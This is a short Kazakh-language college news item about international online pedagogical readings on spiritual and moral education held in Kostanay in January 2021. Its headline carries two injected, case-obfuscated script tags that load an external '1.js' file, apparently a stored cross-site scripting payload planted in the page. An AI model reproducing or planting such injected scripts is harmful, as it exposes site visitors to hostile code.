Халықаралық педагогикалық оқулар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.02.2021
2021 жылдың қаңтар айында Қостанай облысы әкімдігі Білім басқармасының Қостанай педагогикалық колледжінде «Тұлғаны рухани-адамгершілік тәрбиелеу – қоғамның нысаналы бағдары» тақырыбында халықаралық педагогикалық онлайн оқулары өтті. Педагогикалық оқулар бағдарламасы екі бөлімнен тұрды. Бірінші бөлімі пленарлық отырыс форматында өтіп, екінші бөлімі секциялық жұмыстармен жалғасты. 4 секция бойынша баяндамалар оқылды: Мәдениеттер диалогы; Тәрбиенің белсенді түрлері: дәстүрлер мен инновациялар; Идеялар қоржыны; Сұлулық әлемінде.
Педагогикалық оқуларға колледжімізден ағылшын тілі пәнінің оқытушылары А.Б.Сабырова және А.Қ.Ташенова қатысып, жүлделі ІІ орынмен марапатталды. Қатысушыларға Дипломдар мен қатысу сертификаттары берілді.
Просмотров: 489


Пікір қосу



Деректерді қолтаңбаға қосу